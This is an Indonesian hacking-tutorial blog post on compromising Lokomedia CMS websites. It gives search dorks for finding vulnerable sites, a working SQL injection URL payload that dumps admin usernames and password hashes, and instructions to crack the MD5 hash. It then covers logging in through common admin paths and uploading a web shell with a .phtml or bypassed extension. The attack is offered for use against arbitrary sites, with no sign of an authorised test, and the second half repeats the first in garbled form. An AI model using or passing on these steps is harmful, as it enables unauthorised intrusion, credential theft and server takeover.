xixixhi, maap yo baru update artikel, Lanjut Walking Blog geenggs, pade masihh kuat kan puasanyee ampe bedug maghrib akwkwak :D
yoks, kali ini Gue akan ngebahas salah Satu Bug/Celah yg ada pada CMS Lokomedia nih, kite suntik2an dlu, *jekinjectbumi akwkwak :p *ini tutor lama sih >.< *share aja, kali aja masih
Langsung aje Tutorial SQL Injection on Lokomedia CMS .
Dork : - inurl:kategori-23-hiburan.html
- inurl:statis-1-pengantar.html
- inurl:statis-19-beasiswa.html
- inurl:statis-22-kerjasama.html
(kembangin lagi gunakan otak bokepers Lu, biar dpt yg Vuln and Verawan gengs ;*)
1. Dorking menggunakan Search Engine
2. Pilih web target, Lalu masukan eXploitnya.
di target saya menjadi seperti ini: target.c0li/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+kantordesa.html
Terlihat User : joko dan Pasword : 21232f297a57a5a743894a0e4a801fc3 , karena password masih dalam bentuk MD5 maka harus di decrypt, saya menggunakan HashKiller, dan setelah didecrypt hasilnya adalah password: admin.
Kalean bisa gunakan web atau aplikasi laen utk ngeDecrypt MD5 ini.
Untuk login biasanya di :
- www.target.c0li/admin
- www.target.c0li/adminweb
- www.target.c0li/administrator
- www.target.c0li/redaktur
Kali ini loginnya berada di target.c0li/adminweb/
, Kemudian masukan user dan pass di form. Dan hasilnya seperti ini
Untuk mengupload shell bisa dibagian Download, seperti ini
Untuk mengakses shell biasanya di target.c0li/files/namashellLu
*Shell harus berekstensi .phtml *atao coba bypass ekstensi ke yg laen :3
eh sebelumnya add OA Line Kami yoo, kami bagi2in Tema
dah ah, gue mauu Bobo Ganteng dluu -> terus bangun pas Bedug awkkwa
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Salam Suntikan Gengs :3
Sekian dan semoga bermanfaat .. terimakasih
Thanks Atas Author http://tkjcyberart.blogspot.co.id/
2. Pilih web target, Lalu masukan eXploitnya.
di target saya menjadi seperti ini: target.c0li/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+kantordesa.html
Sekarang sudah kelihatan user sama passwordnya di bagian title.
kemudian ctrl+u untuk melihatnya lebih jelas.
Terlihat User : joko dan Pasword : 21232f297a57a5a743894a0e4a801fc3 , karena password masih dalam bentuk MD5 maka harus di decrypt, saya menggunakan HashKiller, dan setelah didecrypt hasilnya adalah password: admin.
Untuk login biasanya di :
- www.target.c0li/admin
- www.target.c0li/adminweb
- www.target.c0li/administrator
- www.target.c0li/redaktur
Kali ini loginnya berada di target.c0li/adminweb/
, Kemudian masukan user dan pass di form. Dan hasilnya seperti ini
Untuk mengakses shell biasanya di target.c0li/files/namashellLueh sebelumnya add OA Line Kami yoo, kami bagi2in Tema
dah ah, gue mauu Bobo Ganteng dluu -> terus bangun pas Bedug awkkwa
Mudahkan x_O ?
Stay Cool and Keep ./Crotz , gaes <(")
bila ada kesalahan mohon di maafkan dan dibenarkan di kolom komentar
Nue cuma niat untuk Share Tutorial, yg bertujuan utk membantu para pemula kek Nue :')
Salam Suntikan Gengs :3
Sekian dan semoga bermanfaat .. terimakasih
Thanks Atas Author http://tkjcyberart.blogspot.co.id/
No comments :
Post a Comment